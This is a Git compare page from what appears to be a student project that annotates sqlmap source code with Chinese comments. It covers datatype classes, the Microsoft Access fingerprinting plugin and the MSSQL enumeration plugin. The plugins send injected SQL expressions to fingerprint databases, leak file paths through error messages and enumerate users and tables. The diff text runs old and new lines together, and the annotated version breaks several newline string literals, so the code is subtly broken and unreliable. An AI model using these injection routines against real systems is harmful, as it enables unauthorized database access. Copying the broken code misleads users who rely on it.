Compare commits

...

36 Commits

Author SHA1 Message Date
pb2p3jg8w 03335aa4b8 Merge pull request '王生晖' (#21) from wangshenghui_new_branch into main
3 months ago
Warmlight 138eb2afc6 代码批注
3 months ago
ptnqoxywl 55306e9378 Merge pull request '王生晖' (#20) from wangshenghui_new_branch into main
3 months ago
Warmlight 97d70fe02a dbms批注
3 months ago
ptnqoxywl 7fe117718c Merge pull request '王生晖' (#19) from wangshenghui_new_branch into main
3 months ago
Warmlight 2ccc7bac72 mysql_filesystem
3 months ago
Warmlight bb4ebc7514 access_fingerprint
3 months ago
Warmlight 7033a8c210 databases批注
3 months ago
Warmlight bb93bced04 entries批注
3 months ago
Warmlight 9b093e7aa4 filesystem批注
3 months ago
Warmlight 6aef1b5ef6 search批注
3 months ago
Warmlight 713615fdc3 syntax批注
3 months ago
Warmlight b7c07b97f7 takeover批注
3 months ago
Warmlight 33e0bdbbec users批注
3 months ago
pfu6rofc7 5db906c518 Merge pull request 'doc合并' (#13) from yangzhisheng_branch into main
3 months ago
snh d5fc7410df 1
3 months ago
snh 156c2f8087
3 months ago
snh 3839500de5 beautifulsoup
3 months ago
snh a8e3bfb78b ansistrm修改
3 months ago
wang 2cd26c5cac 修改win
3 months ago
liguanwei 0d48368694 sunninghao_change
3 months ago
liguanwei e0000da06f sunninghao_change
3 months ago
liguanwei f6a7e9bb9f sunninghao_change
3 months ago
snh 97f589c6cd 识别和显示日志消息中的文件类型
3 months ago
snh ede386d596 结果输出终端的颜色显示
3 months ago
pfu6rofc7 58060f0ed7 Merge pull request 'merge' (#11) from wangjun_branch into main
3 months ago
XU 870ad77d58 源码阅读
3 months ago
XU adc9775021 源码阅读
3 months ago
XU 91f0c8ae15 源码阅读
3 months ago
XU 041f4fb8cc 源码阅读
3 months ago
XU 0dc81c2219 源码阅读
3 months ago
XU 60938dff4c 源码阅读
3 months ago
XU d59959cff9 源码阅读
3 months ago
XU c88ebebca8 2024/12/17
4 months ago
XU 540e1a04ed 2024/12/17
4 months ago
XU 2b074d91a2 2024/12/16
4 months ago

Binary file not shown.

@ -5,13 +5,15 @@ Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission See the file 'LICENSE' for copying permission
""" """
import copy # 导入必要的模块
import threading import copy # 导入 copy 模块,用于对象复制
import types import threading # 导入 threading 模块,用于线程同步
import types # 导入 types 模块,用于类型判断
from thirdparty.odict import OrderedDict from thirdparty.odict import OrderedDict # 导入 thirdparty 中的 OrderedDict 类,用于实现有序字典
from thirdparty.six.moves import collections_abc as _collections from thirdparty.six.moves import collections_abc as _collections # 导入 six 库中的 collections_abc 模块,用于抽象集合类
# 定义 AttribDict 类,继承自 dict允许以属性方式访问字典成员
class AttribDict(dict): class AttribDict(dict):
""" """
This class defines the dictionary with added capability to access members as attributes This class defines the dictionary with added capability to access members as attributes
@ -22,20 +24,20 @@ class AttribDict(dict):
1 1
""" """
# 初始化方法,接受一个字典 indict一个属性 attribute 和一个布尔值 keycheck
def __init__(self, indict=None, attribute=None, keycheck=True): def __init__(self, indict=None, attribute=None, keycheck=True):
if indict is None: if indict is None: # 如果 indict 为空,初始化为空字典
indict = {} indict = {}
# Set any attributes here - before initialisation # 设置属性,这些属性在初始化前是普通属性
# these remain as normal attributes
self.attribute = attribute self.attribute = attribute
self.keycheck = keycheck self.keycheck = keycheck
dict.__init__(self, indict) dict.__init__(self, indict) # 调用 dict 的初始化方法
self.__initialised = True self.__initialised = True # 设置初始化完成标志
# After initialisation, setting attributes # 在初始化之后,设置属性与设置字典项相同
# is the same as setting an item
# 定义 __getattr__ 方法,用于获取属性
def __getattr__(self, item): def __getattr__(self, item):
""" """
Maps values to attributes Maps values to attributes
@ -43,89 +45,95 @@ class AttribDict(dict):
""" """
try: try:
return self.__getitem__(item) return self.__getitem__(item) # 尝试获取字典项
except KeyError: except KeyError: # 如果字典中不存在此键
if self.keycheck: if self.keycheck: # 如果 keycheck 为 True
raise AttributeError("unable to access item '%s'" % item) raise AttributeError("unable to access item '%s'" % item) # 抛出属性错误
else: else: # 如果 keycheck 为 False
return None return None # 返回 None
# 定义 __delattr__ 方法,用于删除属性
def __delattr__(self, item): def __delattr__(self, item):
""" """
Deletes attributes Deletes attributes
""" """
try: try:
return self.pop(item) return self.pop(item) # 尝试从字典中删除项
except KeyError: except KeyError: # 如果字典中不存在此键
if self.keycheck: if self.keycheck: # 如果 keycheck 为 True
raise AttributeError("unable to access item '%s'" % item) raise AttributeError("unable to access item '%s'" % item) # 抛出属性错误
else: else: # 如果 keycheck 为 False
return None return None # 返回 None
# 定义 __setattr__ 方法,用于设置属性
def __setattr__(self, item, value): def __setattr__(self, item, value):
""" """
Maps attributes to values Maps attributes to values
Only if we are initialised Only if we are initialised
""" """
# This test allows attributes to be set in the __init__ method # 在初始化方法中允许设置属性
if "_AttribDict__initialised" not in self.__dict__: if "_AttribDict__initialised" not in self.__dict__:
return dict.__setattr__(self, item, value) return dict.__setattr__(self, item, value)
# Any normal attributes are handled normally # 正常处理普通属性
elif item in self.__dict__: elif item in self.__dict__:
dict.__setattr__(self, item, value) dict.__setattr__(self, item, value)
else: else: # 其他情况,将属性映射到字典项
self.__setitem__(item, value) self.__setitem__(item, value)
# 定义 __getstate__ 方法,用于支持序列化
def __getstate__(self): def __getstate__(self):
return self.__dict__ return self.__dict__
# 定义 __setstate__ 方法,用于支持反序列化
def __setstate__(self, dict): def __setstate__(self, dict):
self.__dict__ = dict self.__dict__ = dict
# 定义 __deepcopy__ 方法,用于深拷贝
def __deepcopy__(self, memo): def __deepcopy__(self, memo):
retVal = self.__class__() retVal = self.__class__() # 创建一个新实例
memo[id(self)] = retVal memo[id(self)] = retVal # 将新实例添加到 memo 中
for attr in dir(self): for attr in dir(self): # 遍历所有属性
if not attr.startswith('_'): if not attr.startswith('_'): # 忽略私有属性
value = getattr(self, attr) value = getattr(self, attr) # 获取属性值
if not isinstance(value, (types.BuiltinFunctionType, types.FunctionType, types.MethodType)): if not isinstance(value, (types.BuiltinFunctionType, types.FunctionType, types.MethodType)): # 忽略内置函数、函数和方法
setattr(retVal, attr, copy.deepcopy(value, memo)) setattr(retVal, attr, copy.deepcopy(value, memo)) # 深拷贝属性值
for key, value in self.items(): for key, value in self.items(): # 遍历所有字典项
retVal.__setitem__(key, copy.deepcopy(value, memo)) retVal.__setitem__(key, copy.deepcopy(value, memo)) # 深拷贝字典项
return retVal return retVal # 返回深拷贝后的实例
# 定义 InjectionDict 类,继承自 AttribDict用于存储注入相关信息
class InjectionDict(AttribDict): class InjectionDict(AttribDict):
def __init__(self): def __init__(self):
AttribDict.__init__(self) AttribDict.__init__(self) # 调用 AttribDict 的初始化方法
self.place = None # 初始化注入信息
self.parameter = None self.place = None # 注入位置
self.ptype = None self.parameter = None # 注入参数
self.prefix = None self.ptype = None # 参数类型
self.suffix = None self.prefix = None # 前缀
self.clause = None self.suffix = None # 后缀
self.notes = [] # Note: https://github.com/sqlmapproject/sqlmap/issues/1888 self.clause = None # 子句
self.notes = [] # 备注列表
# data is a dict with various stype, each which is a dict with
# all the information specific for that stype # data 字典存储不同类型的注入数据
self.data = AttribDict() self.data = AttribDict()
# conf is a dict which stores current snapshot of important # conf 字典存储检测期间使用的重要选项的快照
# options used during detection
self.conf = AttribDict() self.conf = AttribDict()
self.dbms = None self.dbms = None # 数据库类型
self.dbms_version = None self.dbms_version = None # 数据库版本
self.os = None self.os = None # 操作系统
# Reference: https://www.kunxi.org/2014/05/lru-cache-in-python # 定义 LRUDict 类,实现 LRU 缓存字典
# 参考https://www.kunxi.org/2014/05/lru-cache-in-python
class LRUDict(object): class LRUDict(object):
""" """
This class defines the LRU dictionary This class defines the LRU dictionary
@ -141,40 +149,41 @@ class LRUDict(object):
""" """
def __init__(self, capacity): def __init__(self, capacity):
self.capacity = capacity self.capacity = capacity # 设置缓存容量
self.cache = OrderedDict() self.cache = OrderedDict() # 使用 OrderedDict 作为缓存
self.__lock = threading.Lock() self.__lock = threading.Lock() # 创建一个锁,用于线程同步
def __len__(self): def __len__(self):
return len(self.cache) return len(self.cache) # 返回缓存长度
def __contains__(self, key): def __contains__(self, key):
return key in self.cache return key in self.cache # 判断键是否存在于缓存中
def __getitem__(self, key): def __getitem__(self, key):
value = self.cache.pop(key) value = self.cache.pop(key) # 将键从缓存中移除
self.cache[key] = value self.cache[key] = value # 将键添加回缓存,移动到最后
return value return value # 返回键的值
def get(self, key): def get(self, key):
return self.__getitem__(key) return self.__getitem__(key) # 获取键的值
def __setitem__(self, key, value): def __setitem__(self, key, value):
with self.__lock: with self.__lock: # 获取锁,保证线程安全
try: try:
self.cache.pop(key) self.cache.pop(key) # 尝试从缓存中删除键
except KeyError: except KeyError: # 如果键不存在
if len(self.cache) >= self.capacity: if len(self.cache) >= self.capacity: # 如果缓存已满
self.cache.popitem(last=False) self.cache.popitem(last=False) # 删除最老的项
self.cache[key] = value self.cache[key] = value # 将键值添加到缓存中
def set(self, key, value): def set(self, key, value):
self.__setitem__(key, value) self.__setitem__(key, value) # 设置键值
def keys(self): def keys(self):
return self.cache.keys() return self.cache.keys() # 返回缓存的所有键
# Reference: https://code.activestate.com/recipes/576694/ # 定义 OrderedSet 类,实现有序集合
# 参考https://code.activestate.com/recipes/576694/
class OrderedSet(_collections.MutableSet): class OrderedSet(_collections.MutableSet):
""" """
This class defines the set with ordered (as added) items This class defines the set with ordered (as added) items
@ -192,57 +201,57 @@ class OrderedSet(_collections.MutableSet):
""" """
def __init__(self, iterable=None): def __init__(self, iterable=None):
self.end = end = [] self.end = end = [] # 创建哨兵节点
end += [None, end, end] # sentinel node for doubly linked list end += [None, end, end] # 双向链表的哨兵节点
self.map = {} # key --> [key, prev, next] self.map = {} # 存储键值和链表节点的映射
if iterable is not None: if iterable is not None:
self |= iterable self |= iterable # 添加可迭代对象
def __len__(self): def __len__(self):
return len(self.map) return len(self.map) # 返回集合长度
def __contains__(self, key): def __contains__(self, key):
return key in self.map return key in self.map # 判断键是否存在于集合中
def add(self, value): def add(self, value):
if value not in self.map: if value not in self.map: # 如果值不在集合中
end = self.end end = self.end
curr = end[1] curr = end[1]
curr[2] = end[1] = self.map[value] = [value, curr, end] curr[2] = end[1] = self.map[value] = [value, curr, end] # 添加新节点到链表尾部
def discard(self, value): def discard(self, value):
if value in self.map: if value in self.map: # 如果值在集合中
value, prev, next = self.map.pop(value) value, prev, next = self.map.pop(value) # 移除节点
prev[2] = next prev[2] = next # 更新链表
next[1] = prev next[1] = prev
def __iter__(self): def __iter__(self):
end = self.end end = self.end
curr = end[2] curr = end[2] # 从链表头开始遍历
while curr is not end: while curr is not end:
yield curr[0] yield curr[0]
curr = curr[2] curr = curr[2] # 移动到下一个节点
def __reversed__(self): def __reversed__(self):
end = self.end end = self.end
curr = end[1] curr = end[1] # 从链表尾开始遍历
while curr is not end: while curr is not end:
yield curr[0] yield curr[0]
curr = curr[1] curr = curr[1] # 移动到上一个节点
def pop(self, last=True): def pop(self, last=True):
if not self: if not self: # 如果集合为空
raise KeyError('set is empty') raise KeyError('set is empty')
key = self.end[1][0] if last else self.end[2][0] key = self.end[1][0] if last else self.end[2][0] # 获取最后一个或第一个元素
self.discard(key) self.discard(key) # 移除元素
return key return key # 返回元素值
def __repr__(self): def __repr__(self):
if not self: if not self: # 如果集合为空
return '%s()' % (self.__class__.__name__,) return '%s()' % (self.__class__.__name__,)
return '%s(%r)' % (self.__class__.__name__, list(self)) return '%s(%r)' % (self.__class__.__name__, list(self)) # 返回字符串表示
def __eq__(self, other): def __eq__(self, other):
if isinstance(other, OrderedSet): if isinstance(other, OrderedSet): # 如果另一个对象是有序集合
return len(self) == len(other) and list(self) == list(other) return len(self) == len(other) and list(self) == list(other) # 比较长度和内容
return set(self) == set(other) return set(self) == set(other) # 比较集合内容

@ -7,94 +7,109 @@ See the file 'LICENSE' for copying permission
import re import re
from lib.core.common import Backend # 1. 从库中引入需要的模块和类
from lib.core.common import Format from lib.core.common import Backend # 后端数据库信息
from lib.core.common import getCurrentThreadData from lib.core.common import Format # 格式化输出
from lib.core.common import randomStr from lib.core.common import getCurrentThreadData # 获取当前线程的数据
from lib.core.common import wasLastResponseDBMSError from lib.core.common import randomStr # 生成随机字符串
from lib.core.data import conf from lib.core.common import wasLastResponseDBMSError # 判断最后响应是否包含数据库错误
from lib.core.data import kb from lib.core.data import conf # 全局配置信息
from lib.core.data import logger from lib.core.data import kb # 全局知识库
from lib.core.enums import DBMS from lib.core.data import logger # 日志记录器
from lib.core.session import setDbms from lib.core.enums import DBMS # 数据库类型枚举
from lib.core.settings import ACCESS_ALIASES from lib.core.session import setDbms # 设置当前数据库类型
from lib.core.settings import METADB_SUFFIX from lib.core.settings import ACCESS_ALIASES # ACCESS 数据库的别名
from lib.request import inject from lib.core.settings import METADB_SUFFIX # 元数据表后缀
from plugins.generic.fingerprint import Fingerprint as GenericFingerprint from lib.request import inject # 注入相关函数
from plugins.generic.fingerprint import Fingerprint as GenericFingerprint # 通用指纹识别类
# 2. 定义一个类 Fingerprint继承自 GenericFingerprint
class Fingerprint(GenericFingerprint): class Fingerprint(GenericFingerprint):
# 3. 构造函数,初始化数据库类型
def __init__(self): def __init__(self):
GenericFingerprint.__init__(self, DBMS.ACCESS) GenericFingerprint.__init__(self, DBMS.ACCESS)
# 4. 私有方法,检查是否在沙盒中运行
def _sandBoxCheck(self): def _sandBoxCheck(self):
# Reference: http://milw0rm.com/papers/198 # 参考链接: http://milw0rm.com/papers/198
retVal = None retVal = None
table = None table = None
# 5. 根据 Access 版本设置需要查询的表名
if Backend.isVersionWithin(("97", "2000")): if Backend.isVersionWithin(("97", "2000")):
table = "MSysAccessObjects" table = "MSysAccessObjects"
elif Backend.isVersionWithin(("2002-2003", "2007")): elif Backend.isVersionWithin(("2002-2003", "2007")):
table = "MSysAccessStorage" table = "MSysAccessStorage"
# 6. 如果有对应的表名,则执行查询判断是否处于沙盒环境
if table is not None: if table is not None:
result = inject.checkBooleanExpression("EXISTS(SELECT CURDIR() FROM %s)" % table) result = inject.checkBooleanExpression("EXISTS(SELECT CURDIR() FROM %s)" % table)
retVal = "not sandboxed" if result else "sandboxed" retVal = "not sandboxed" if result else "sandboxed"
# 7. 返回检测结果
return retVal return retVal
# 8. 私有方法,检查系统表是否存在
def _sysTablesCheck(self): def _sysTablesCheck(self):
infoMsg = "executing system table(s) existence fingerprint" infoMsg = "executing system table(s) existence fingerprint"
logger.info(infoMsg) logger.info(infoMsg)
# Microsoft Access table reference updated on 01/2010 # 9. 定义不同版本 Access 需要检查的系统表
sysTables = { sysTables = {
"97": ("MSysModules2", "MSysAccessObjects"), "97": ("MSysModules2", "MSysAccessObjects"),
"2000": ("!MSysModules2", "MSysAccessObjects"), "2000": ("!MSysModules2", "MSysAccessObjects"),
"2002-2003": ("MSysAccessStorage", "!MSysNavPaneObjectIDs"), "2002-2003": ("MSysAccessStorage", "!MSysNavPaneObjectIDs"),
"2007": ("MSysAccessStorage", "MSysNavPaneObjectIDs"), "2007": ("MSysAccessStorage", "MSysNavPaneObjectIDs"),
} }
# MSysAccessXML 是不稳定的系统表,因为它并非总是存在
# MSysAccessXML is not a reliable system table because it doesn't always exist # 10. 遍历系统表,进行检查
# ("Access through Access", p6, should be "normally doesn't exist" instead of "is normally empty")
for version, tables in sysTables.items(): for version, tables in sysTables.items():
exist = True exist = True
for table in tables: for table in tables:
negate = False negate = False
# 11. 如果表名以 ! 开头,表示该表应该不存在
if table[0] == '!': if table[0] == '!':
negate = True negate = True
table = table[1:] table = table[1:]
# 12. 执行 SQL 查询,检查表是否存在
result = inject.checkBooleanExpression("EXISTS(SELECT * FROM %s WHERE [RANDNUM]=[RANDNUM])" % table) result = inject.checkBooleanExpression("EXISTS(SELECT * FROM %s WHERE [RANDNUM]=[RANDNUM])" % table)
if result is None: if result is None:
result = False result = False
# 13. 如果表不应该存在,则取反
if negate: if negate:
result = not result result = not result
# 14. 对所有表的结果进行与运算,只有都满足才能认为当前版本匹配
exist &= result exist &= result
if not exist: if not exist:
break break
# 15. 如果当前版本匹配,则返回版本号
if exist: if exist:
return version return version
# 16. 如果所有版本都不匹配,则返回 None
return None return None
# 17. 私有方法,获取数据库所在目录
def _getDatabaseDir(self): def _getDatabaseDir(self):
retVal = None retVal = None
infoMsg = "searching for database directory" infoMsg = "searching for database directory"
logger.info(infoMsg) logger.info(infoMsg)
# 18. 生成随机字符串
randStr = randomStr() randStr = randomStr()
# 19. 执行 SQL 查询,尝试触发错误,获取数据库目录
inject.checkBooleanExpression("EXISTS(SELECT * FROM %s.%s WHERE [RANDNUM]=[RANDNUM])" % (randStr, randStr)) inject.checkBooleanExpression("EXISTS(SELECT * FROM %s.%s WHERE [RANDNUM]=[RANDNUM])" % (randStr, randStr))
# 20. 如果最后响应包含数据库错误
if wasLastResponseDBMSError(): if wasLastResponseDBMSError():
threadData = getCurrentThreadData() threadData = getCurrentThreadData()
# 21. 从错误信息中提取数据库目录
match = re.search(r"Could not find file\s+'([^']+?)'", threadData.lastErrorPage[1]) match = re.search(r"Could not find file\s+'([^']+?)'", threadData.lastErrorPage[1])
if match: if match:
@ -102,92 +117,115 @@ class Fingerprint(GenericFingerprint):
if retVal.endswith('\\'): if retVal.endswith('\\'):
retVal = retVal[:-1] retVal = retVal[:-1]
# 22. 返回数据库目录
return retVal return retVal
# 23. 获取指纹信息
def getFingerprint(self): def getFingerprint(self):
value = "" value = ""
# 24. 获取 Web 服务器操作系统指纹
wsOsFp = Format.getOs("web server", kb.headersFp) wsOsFp = Format.getOs("web server", kb.headersFp)
# 25. 将 Web 服务器操作系统指纹添加到输出
if wsOsFp: if wsOsFp:
value += "%s\n" % wsOsFp value += "%s\
" % wsOsFp
# 26. 如果有数据库 Banner 信息
if kb.data.banner: if kb.data.banner:
# 27. 获取后端数据库操作系统指纹
dbmsOsFp = Format.getOs("back-end DBMS", kb.bannerFp) dbmsOsFp = Format.getOs("back-end DBMS", kb.bannerFp)
# 28. 将后端数据库操作系统指纹添加到输出
if dbmsOsFp: if dbmsOsFp:
value += "%s\n" % dbmsOsFp value += "%s\
" % dbmsOsFp
value += "back-end DBMS: " value += "back-end DBMS: "
# 29. 如果不是详细指纹,则返回数据库类型
if not conf.extensiveFp: if not conf.extensiveFp:
value += DBMS.ACCESS value += DBMS.ACCESS
return value return value
# 30. 获取活动的指纹信息
actVer = Format.getDbms() + " (%s)" % (self._sandBoxCheck()) actVer = Format.getDbms() + " (%s)" % (self._sandBoxCheck())
blank = " " * 15 blank = " " * 15
value += "active fingerprint: %s" % actVer value += "active fingerprint: %s" % actVer
# 31. 如果有 Banner 解析指纹
if kb.bannerFp: if kb.bannerFp:
banVer = kb.bannerFp.get("dbmsVersion") banVer = kb.bannerFp.get("dbmsVersion")
# 32. 如果有 Banner 版本号
if banVer: if banVer:
# 33. 如果 Banner 信息包含 -log则表示启用日志
if re.search(r"-log$", kb.data.banner or ""): if re.search(r"-log$", kb.data.banner or ""):
banVer += ", logging enabled" banVer += ", logging enabled"
# 34. 格式化 Banner 版本号
banVer = Format.getDbms([banVer]) banVer = Format.getDbms([banVer])
value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer) value += "\
%sbanner parsing fingerprint: %s" % (blank, banVer)
# 35. 获取 HTML 错误指纹
htmlErrorFp = Format.getErrorParsedDBMSes() htmlErrorFp = Format.getErrorParsedDBMSes()
# 36. 将 HTML 错误指纹添加到输出
if htmlErrorFp: if htmlErrorFp:
value += "\n%shtml error message fingerprint: %s" % (blank, htmlErrorFp) value += "\
%shtml error message fingerprint: %s" % (blank, htmlErrorFp)
value += "\ndatabase directory: '%s'" % self._getDatabaseDir() # 37. 获取数据库目录并添加到输出
value += "\
database directory: '%s'" % self._getDatabaseDir()
# 38. 返回完整的指纹信息
return value return value
# 39. 检查数据库类型是否为 Access
def checkDbms(self): def checkDbms(self):
# 40. 如果不是详细指纹,且当前数据库类型属于 Access 别名,则设置数据库类型为 Access 并返回 True
if not conf.extensiveFp and Backend.isDbmsWithin(ACCESS_ALIASES): if not conf.extensiveFp and Backend.isDbmsWithin(ACCESS_ALIASES):
setDbms(DBMS.ACCESS) setDbms(DBMS.ACCESS)
return True return True
# 41. 输出正在测试的数据库类型
infoMsg = "testing %s" % DBMS.ACCESS infoMsg = "testing %s" % DBMS.ACCESS
logger.info(infoMsg) logger.info(infoMsg)
# 42. 执行 SQL 查询,检查数据库类型是否为 Access
result = inject.checkBooleanExpression("VAL(CVAR(1))=1") result = inject.checkBooleanExpression("VAL(CVAR(1))=1")
# 43. 如果查询成功
if result: if result:
infoMsg = "confirming %s" % DBMS.ACCESS infoMsg = "confirming %s" % DBMS.ACCESS
logger.info(infoMsg) logger.info(infoMsg)
# 44. 执行 SQL 查询,再次确认数据库类型是否为 Access
result = inject.checkBooleanExpression("IIF(ATN(2)>0,1,0) BETWEEN 2 AND 0") result = inject.checkBooleanExpression("IIF(ATN(2)>0,1,0) BETWEEN 2 AND 0")
# 45. 如果再次确认失败,则输出警告信息,并返回 False
if not result: if not result:
warnMsg = "the back-end DBMS is not %s" % DBMS.ACCESS warnMsg = "the back-end DBMS is not %s" % DBMS.ACCESS
logger.warning(warnMsg) logger.warning(warnMsg)
return False return False
# 46. 设置数据库类型为 Access
setDbms(DBMS.ACCESS) setDbms(DBMS.ACCESS)
# 47. 如果不是详细指纹,则返回 True
if not conf.extensiveFp: if not conf.extensiveFp:
return True return True
# 48. 输出正在进行详细指纹识别
infoMsg = "actively fingerprinting %s" % DBMS.ACCESS infoMsg = "actively fingerprinting %s" % DBMS.ACCESS
logger.info(infoMsg) logger.info(infoMsg)
# 49. 执行系统表检查,获取 Access 版本
version = self._sysTablesCheck() version = self._sysTablesCheck()
# 50. 如果获取到版本信息,则设置数据库版本
if version is not None: if version is not None:
Backend.setVersion(version) Backend.setVersion(version)
# 51. 返回 True
return True return True
# 52. 如果第一次查询失败,则输出警告信息,并返回 False
else: else:
warnMsg = "the back-end DBMS is not %s" % DBMS.ACCESS warnMsg = "the back-end DBMS is not %s" % DBMS.ACCESS
logger.warning(warnMsg) logger.warning(warnMsg)
return False return False
# 53. 强制枚举数据库类型
def forceDbmsEnum(self): def forceDbmsEnum(self):
# 54. 设置数据库名称
conf.db = ("%s%s" % (DBMS.ACCESS, METADB_SUFFIX)).replace(' ', '_') conf.db = ("%s%s" % (DBMS.ACCESS, METADB_SUFFIX)).replace(' ', '_')

@ -5,45 +5,50 @@ Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission See the file 'LICENSE' for copying permission
""" """
import re # 导入必要的模块
import re # 导入正则表达式模块,用于进行模式匹配
from lib.core.agent import agent
from lib.core.common import arrayizeValue from lib.core.agent import agent # 导入 agent 模块,用于执行 SQL 注入
from lib.core.common import getLimitRange from lib.core.common import arrayizeValue # 导入 arrayizeValue 函数,用于将值转换为列表
from lib.core.common import isInferenceAvailable from lib.core.common import getLimitRange # 导入 getLimitRange 函数,用于生成限制范围
from lib.core.common import isNoneValue from lib.core.common import isInferenceAvailable # 导入 isInferenceAvailable 函数,用于检查是否可以使用推断注入
from lib.core.common import isNumPosStrValue from lib.core.common import isNoneValue # 导入 isNoneValue 函数,用于检查值是否为 None
from lib.core.common import isTechniqueAvailable from lib.core.common import isNumPosStrValue # 导入 isNumPosStrValue 函数,用于检查值是否为正数字字符串
from lib.core.common import safeSQLIdentificatorNaming from lib.core.common import isTechniqueAvailable # 导入 isTechniqueAvailable 函数,用于检查指定的注入技术是否可用
from lib.core.common import safeStringFormat from lib.core.common import safeSQLIdentificatorNaming # 导入 safeSQLIdentificatorNaming 函数,用于安全地命名 SQL 标识符
from lib.core.common import singleTimeLogMessage from lib.core.common import safeStringFormat # 导入 safeStringFormat 函数,用于安全地格式化字符串
from lib.core.common import unArrayizeValue from lib.core.common import singleTimeLogMessage # 导入 singleTimeLogMessage 函数,用于只输出一次的日志消息
from lib.core.common import unsafeSQLIdentificatorNaming from lib.core.common import unArrayizeValue # 导入 unArrayizeValue 函数,用于从列表中提取值
from lib.core.compat import xrange from lib.core.common import unsafeSQLIdentificatorNaming # 导入 unsafeSQLIdentificatorNaming 函数,用于不安全地命名 SQL 标识符
from lib.core.data import conf from lib.core.compat import xrange # 导入 xrange 函数,用于兼容 Python 2 和 3 的循环
from lib.core.data import kb from lib.core.data import conf # 导入 conf 对象,用于访问全局配置信息
from lib.core.data import logger from lib.core.data import kb # 导入 kb 对象,用于访问全局知识库
from lib.core.data import queries from lib.core.data import logger # 导入 logger 对象,用于输出日志
from lib.core.enums import CHARSET_TYPE from lib.core.data import queries # 导入 queries 对象,用于获取预定义的 SQL 查询语句
from lib.core.enums import DBMS from lib.core.enums import CHARSET_TYPE # 导入 CHARSET_TYPE 枚举,定义字符集类型
from lib.core.enums import EXPECTED from lib.core.enums import DBMS # 导入 DBMS 枚举,定义数据库管理系统类型
from lib.core.enums import PAYLOAD from lib.core.enums import EXPECTED # 导入 EXPECTED 枚举,定义期望的返回值类型
from lib.core.exception import SqlmapNoneDataException from lib.core.enums import PAYLOAD # 导入 PAYLOAD 枚举,定义注入类型
from lib.core.settings import CURRENT_DB from lib.core.exception import SqlmapNoneDataException # 导入 SqlmapNoneDataException 异常类,用于表示没有数据
from lib.request import inject from lib.core.settings import CURRENT_DB # 导入 CURRENT_DB 常量,表示当前数据库
from plugins.generic.enumeration import Enumeration as GenericEnumeration from lib.request import inject # 导入 inject 函数,用于执行 SQL 注入请求
from thirdparty import six from plugins.generic.enumeration import Enumeration as GenericEnumeration # 导入 GenericEnumeration 类,作为当前类的父类
from thirdparty import six # 导入 six 模块,用于兼容 Python 2 和 3
# 定义 Enumeration 类,继承自 GenericEnumeration
class Enumeration(GenericEnumeration): class Enumeration(GenericEnumeration):
# 定义 getPrivileges 方法,用于获取数据库用户的权限
def getPrivileges(self, *args, **kwargs): def getPrivileges(self, *args, **kwargs):
# 输出警告信息,说明在 Microsoft SQL Server 上无法获取用户权限,只会检查是否是 DBA
warnMsg = "on Microsoft SQL Server it is not possible to fetch " warnMsg = "on Microsoft SQL Server it is not possible to fetch "
warnMsg += "database users privileges, sqlmap will check whether " warnMsg += "database users privileges, sqlmap will check whether "
warnMsg += "or not the database users are database administrators" warnMsg += "or not the database users are database administrators"
logger.warning(warnMsg) logger.warning(warnMsg)
users = [] users = [] # 初始化用户列表
areAdmins = set() areAdmins = set() # 初始化管理员集合
# 如果配置中指定了用户,则使用该用户,否则获取所有用户
if conf.user: if conf.user:
users = [conf.user] users = [conf.user]
elif not len(kb.data.cachedUsers): elif not len(kb.data.cachedUsers):
@ -51,91 +56,114 @@ class Enumeration(GenericEnumeration):
else: else:
users = kb.data.cachedUsers users = kb.data.cachedUsers
# 遍历用户列表
for user in users: for user in users:
user = unArrayizeValue(user) user = unArrayizeValue(user) # 从列表中提取用户
if user is None: if user is None: # 如果用户为 None则跳过
continue continue
isDba = self.isDba(user) isDba = self.isDba(user) # 检查用户是否为 DBA
if isDba is True: if isDba is True: # 如果是 DBA则添加到管理员集合
areAdmins.add(user) areAdmins.add(user)
kb.data.cachedUsersPrivileges[user] = None kb.data.cachedUsersPrivileges[user] = None # 设置用户的权限信息为 None
# 返回用户的权限信息和管理员集合
return (kb.data.cachedUsersPrivileges, areAdmins) return (kb.data.cachedUsersPrivileges, areAdmins)
# 定义 getTables 方法,用于获取数据库表
def getTables(self): def getTables(self):
# 如果知识库中已缓存表信息,则直接返回
if len(kb.data.cachedTables) > 0: if len(kb.data.cachedTables) > 0:
return kb.data.cachedTables return kb.data.cachedTables
self.forceDbmsEnum() self.forceDbmsEnum() # 强制执行 DBMS 枚举
# 如果配置中指定了当前数据库,则获取当前数据库
if conf.db == CURRENT_DB: if conf.db == CURRENT_DB:
conf.db = self.getCurrentDb() conf.db = self.getCurrentDb()
# 如果配置中指定了数据库,则分割数据库字符串,否则获取所有数据库
if conf.db: if conf.db:
dbs = conf.db.split(',') dbs = conf.db.split(',')
else: else:
dbs = self.getDbs() dbs = self.getDbs()
# 对每个数据库名进行安全命名
for db in dbs: for db in dbs:
dbs[dbs.index(db)] = safeSQLIdentificatorNaming(db) dbs[dbs.index(db)] = safeSQLIdentificatorNaming(db)
# 移除空字符串的数据库
dbs = [_ for _ in dbs if _] dbs = [_ for _ in dbs if _]
# 输出获取表信息的提示信息
infoMsg = "fetching tables for database" infoMsg = "fetching tables for database"
infoMsg += "%s: %s" % ("s" if len(dbs) > 1 else "", ", ".join(db if isinstance(db, six.string_types) else db[0] for db in sorted(dbs))) infoMsg += "%s: %s" % ("s" if len(dbs) > 1 else "", ", ".join(db if isinstance(db, six.string_types) else db[0] for db in sorted(dbs)))
logger.info(infoMsg) logger.info(infoMsg)
# 获取 SQL Server 的表查询语句
rootQuery = queries[DBMS.MSSQL].tables rootQuery = queries[DBMS.MSSQL].tables
# 检查是否可以使用 UNION、ERROR、QUERY 注入技术或直接连接
if any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) or conf.direct: if any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) or conf.direct:
# 遍历数据库列表
for db in dbs: for db in dbs:
# 如果配置中排除了系统数据库,则跳过
if conf.excludeSysDbs and db in self.excludeDbsList: if conf.excludeSysDbs and db in self.excludeDbsList:
infoMsg = "skipping system database '%s'" % db infoMsg = "skipping system database '%s'" % db
singleTimeLogMessage(infoMsg) singleTimeLogMessage(infoMsg)
continue continue
